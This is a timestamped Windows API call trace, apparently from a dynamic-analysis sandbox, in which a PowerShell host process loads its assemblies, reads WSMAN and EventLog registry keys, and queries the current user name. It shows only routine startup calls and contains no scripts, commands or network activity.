	[0176.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdcab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdcab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.556] VirtualQuery (in: lpAddress=0xdbee0, lpBuffer=0xdcda0, dwLength=0x30 | out: lpBuffer=0xdcda0*(BaseAddress=0xdb000, AllocationBase=0x60000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0176.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.557] VirtualQuery (in: lpAddress=0xdbee0, lpBuffer=0xdcda0, dwLength=0x30 | out: lpBuffer=0xdcda0*(BaseAddress=0xdb000, AllocationBase=0x60000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0176.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0178.006] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xdd460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0178.007] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xdd460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0178.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0178.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0178.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xdd460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0178.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xdd460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0179.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xdd460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0179.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xdd460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0191.945] CoTaskMemAlloc (cb=0x104) returned 0x27d410
	[0191.945] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d410, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0191.945] CoTaskMemFree (pv=0x27d410) 
	[0191.946] CoTaskMemAlloc (cb=0x104) returned 0x27d410
	[0191.946] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d410, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0191.946] CoTaskMemFree (pv=0x27d410) 
	[0191.947] CoTaskMemAlloc (cb=0x104) returned 0x27d410
	[0191.947] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d410, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0191.947] CoTaskMemFree (pv=0x27d410) 
	[0191.949] CoTaskMemAlloc (cb=0x104) returned 0x27d410
	[0191.949] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d410, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0191.949] CoTaskMemFree (pv=0x27d410) 
	[0192.338] CoTaskMemAlloc (cb=0x104) returned 0x27d410
	[0192.338] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d410, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0192.338] CoTaskMemFree (pv=0x27d410) 
	[0192.698] CoTaskMemAlloc (cb=0x104) returned 0x27d410
	[0192.698] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d410, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0192.698] CoTaskMemFree (pv=0x27d410) 
	[0192.699] CoTaskMemAlloc (cb=0x104) returned 0x27d410
	[0192.699] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d410, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0192.699] CoTaskMemFree (pv=0x27d410) 
	[0193.171] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd6a8 | out: phkResult=0xdd6a8*=0x31c) returned 0x0
	[0193.535] RegQueryInfoKeyW (in: hKey=0x31c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xdd5ac, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xdd5a8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xdd5ac*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xdd5a8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0193.535] CoTaskMemFree (pv=0x0) 
	[0193.536] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0193.536] RegEnumValueW (in: hKey=0x31c, dwIndex=0x0, lpValueName=0x288f70, lpcchValueName=0xdd658, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xdd658, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0193.536] CoTaskMemFree (pv=0x288f70) 
	[0193.536] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0193.536] RegEnumValueW (in: hKey=0x31c, dwIndex=0x1, lpValueName=0x288f70, lpcchValueName=0xdd658, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xdd658, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0193.536] CoTaskMemFree (pv=0x288f70) 
	[0193.536] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0193.537] RegEnumValueW (in: hKey=0x31c, dwIndex=0x2, lpValueName=0x288f70, lpcchValueName=0xdd658, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xdd658, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0193.537] CoTaskMemFree (pv=0x288f70) 
	[0193.538] RegQueryValueExW (in: hKey=0x31c, lpValueName="StackVersion", lpReserved=0x0, lpType=0xdd63c, lpData=0x0, lpcbData=0xdd638*=0x0 | out: lpType=0xdd63c*=0x1, lpData=0x0, lpcbData=0xdd638*=0x8) returned 0x0
	[0193.538] CoTaskMemAlloc (cb=0xc) returned 0x1b858b60
	[0193.538] RegQueryValueExW (in: hKey=0x31c, lpValueName="StackVersion", lpReserved=0x0, lpType=0xdd60c, lpData=0x1b858b60, lpcbData=0xdd608*=0x8 | out: lpType=0xdd60c*=0x1, lpData="2.0", lpcbData=0xdd608*=0x8) returned 0x0
	[0193.538] CoTaskMemFree (pv=0x1b858b60) 
	[0196.726] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd5f8 | out: phkResult=0xdd5f8*=0x320) returned 0x0
	[0196.727] RegQueryInfoKeyW (in: hKey=0x320, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xdd4fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xdd4f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xdd4fc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xdd4f8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0196.727] CoTaskMemFree (pv=0x0) 
	[0196.727] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0196.727] RegEnumValueW (in: hKey=0x320, dwIndex=0x0, lpValueName=0x288f70, lpcchValueName=0xdd5a8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xdd5a8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0196.727] CoTaskMemFree (pv=0x288f70) 
	[0196.727] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0196.727] RegEnumValueW (in: hKey=0x320, dwIndex=0x1, lpValueName=0x288f70, lpcchValueName=0xdd5a8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xdd5a8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0196.727] CoTaskMemFree (pv=0x288f70) 
	[0196.727] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0196.727] RegEnumValueW (in: hKey=0x320, dwIndex=0x2, lpValueName=0x288f70, lpcchValueName=0xdd5a8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xdd5a8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0196.727] CoTaskMemFree (pv=0x288f70) 
	[0196.727] RegQueryValueExW (in: hKey=0x320, lpValueName="StackVersion", lpReserved=0x0, lpType=0xdd58c, lpData=0x0, lpcbData=0xdd588*=0x0 | out: lpType=0xdd58c*=0x1, lpData=0x0, lpcbData=0xdd588*=0x8) returned 0x0
	[0196.727] CoTaskMemAlloc (cb=0xc) returned 0x1b858a80
	[0196.727] RegQueryValueExW (in: hKey=0x320, lpValueName="StackVersion", lpReserved=0x0, lpType=0xdd55c, lpData=0x1b858a80, lpcbData=0xdd558*=0x8 | out: lpType=0xdd55c*=0x1, lpData="2.0", lpcbData=0xdd558*=0x8) returned 0x0
	[0196.727] CoTaskMemFree (pv=0x1b858a80) 
	[0196.728] CoTaskMemAlloc (cb=0x104) returned 0x27d410
	[0196.728] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d410, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0196.728] CoTaskMemFree (pv=0x27d410) 
	[0196.733] CoTaskMemAlloc (cb=0x104) returned 0x27d410
	[0196.752] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d410, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0196.752] CoTaskMemFree (pv=0x27d410) 
	[0200.587] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd628 | out: phkResult=0xdd628*=0x308) returned 0x0
	[0200.590] RegQueryInfoKeyW (in: hKey=0x308, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xdd59c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xdd598, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xdd59c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xdd598*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0200.590] CoTaskMemFree (pv=0x0) 
	[0200.591] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0200.591] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x0, lpName=0x288f70, lpcchName=0xdd628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xdd628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0200.591] CoTaskMemFree (pv=0x288f70) 
	[0200.591] CoTaskMemFree (pv=0x0) 
	[0200.591] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0200.591] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x1, lpName=0x288f70, lpcchName=0xdd628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xdd628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0200.591] CoTaskMemFree (pv=0x288f70) 
	[0200.591] CoTaskMemFree (pv=0x0) 
	[0200.591] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0200.591] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x2, lpName=0x288f70, lpcchName=0xdd628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xdd628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0200.592] CoTaskMemFree (pv=0x288f70) 
	[0200.592] CoTaskMemFree (pv=0x0) 
	[0200.592] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0200.592] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x3, lpName=0x288f70, lpcchName=0xdd628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xdd628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0200.592] CoTaskMemFree (pv=0x288f70) 
	[0200.592] CoTaskMemFree (pv=0x0) 
	[0200.592] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0200.592] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x4, lpName=0x288f70, lpcchName=0xdd628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xdd628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0200.592] CoTaskMemFree (pv=0x288f70) 
	[0200.592] CoTaskMemFree (pv=0x0) 
	[0200.592] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0200.592] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x5, lpName=0x288f70, lpcchName=0xdd628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xdd628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0200.592] CoTaskMemFree (pv=0x288f70) 
	[0200.592] CoTaskMemFree (pv=0x0) 
	[0200.592] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0200.592] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x6, lpName=0x288f70, lpcchName=0xdd628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xdd628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0200.592] CoTaskMemFree (pv=0x288f70) 
	[0200.592] CoTaskMemFree (pv=0x0) 
	[0200.592] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0200.592] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x7, lpName=0x288f70, lpcchName=0xdd628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xdd628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0200.592] CoTaskMemFree (pv=0x288f70) 
	[0200.592] CoTaskMemFree (pv=0x0) 
	[0200.592] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0200.592] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x8, lpName=0x288f70, lpcchName=0xdd628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xdd628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0200.592] CoTaskMemFree (pv=0x288f70) 
	[0200.592] CoTaskMemFree (pv=0x0) 
	[0200.592] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd688 | out: phkResult=0xdd688*=0x324) returned 0x0
	[0200.592] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd688 | out: phkResult=0xdd688*=0x0) returned 0x2
	[0200.593] RegOpenKeyExW (in: hKey=0x308, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd688 | out: phkResult=0xdd688*=0x328) returned 0x0
	[0200.593] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd688 | out: phkResult=0xdd688*=0x0) returned 0x2
	[0200.593] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd688 | out: phkResult=0xdd688*=0x30c) returned 0x0
	[0200.593] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd688 | out: phkResult=0xdd688*=0x0) returned 0x2
	[0200.593] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd688 | out: phkResult=0xdd688*=0x1d0) returned 0x0
	[0200.593] RegOpenKeyExW (in: hKey=0x1d0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd688 | out: phkResult=0xdd688*=0x0) returned 0x2
	[0200.593] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd688 | out: phkResult=0xdd688*=0x32c) returned 0x0
	[0200.593] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd688 | out: phkResult=0xdd688*=0x0) returned 0x2
	[0200.593] RegOpenKeyExW (in: hKey=0x308, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd688 | out: phkResult=0xdd688*=0x330) returned 0x0
	[0200.593] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd688 | out: phkResult=0xdd688*=0x0) returned 0x2
	[0200.593] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd688 | out: phkResult=0xdd688*=0x0) returned 0x5
	[0201.773] RegOpenKeyExW (in: hKey=0x308, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd688 | out: phkResult=0xdd688*=0x334) returned 0x0
	[0201.773] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd688 | out: phkResult=0xdd688*=0x0) returned 0x2
	[0201.773] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd688 | out: phkResult=0xdd688*=0x338) returned 0x0
	[0201.773] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd688 | out: phkResult=0xdd688*=0x33c) returned 0x0
	[0201.773] RegCloseKey (hKey=0x33c) returned 0x0
	[0201.774] RegCloseKey (hKey=0x308) returned 0x0
	[0201.774] RegCloseKey (hKey=0x338) returned 0x0
	[0201.865] CoTaskMemAlloc (cb=0x804) returned 0x1b8700e0
	[0201.865] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8700e0, nSize=0xdd898 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xdd898) returned 0x1
	[0201.866] CoTaskMemFree (pv=0x1b8700e0) 
	[0201.867] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0201.867] GetUserNameW (in: lpBuffer=0x288f70, pcbBuffer=0xdd8d8 | out: lpBuffer="aETAdzjz", pcbBuffer=0xdd8d8) returned 1
	[0201.867] CoTaskMemFree (pv=0x288f70) 
	[0203.221] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd5d8 | out: phkResult=0xdd5d8*=0x340) returned 0x0
	[0203.222] RegQueryInfoKeyW (in: hKey=0x340, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xdd54c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xdd548, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xdd54c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xdd548*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.222] CoTaskMemFree (pv=0x0) 
	[0203.222] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0203.222] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x0, lpName=0x288f70, lpcchName=0xdd5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xdd5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.222] CoTaskMemFree (pv=0x288f70) 
	[0203.222] CoTaskMemFree (pv=0x0) 
	[0203.222] CoTaskMemAlloc (cb=0x204) returned 0x288f70
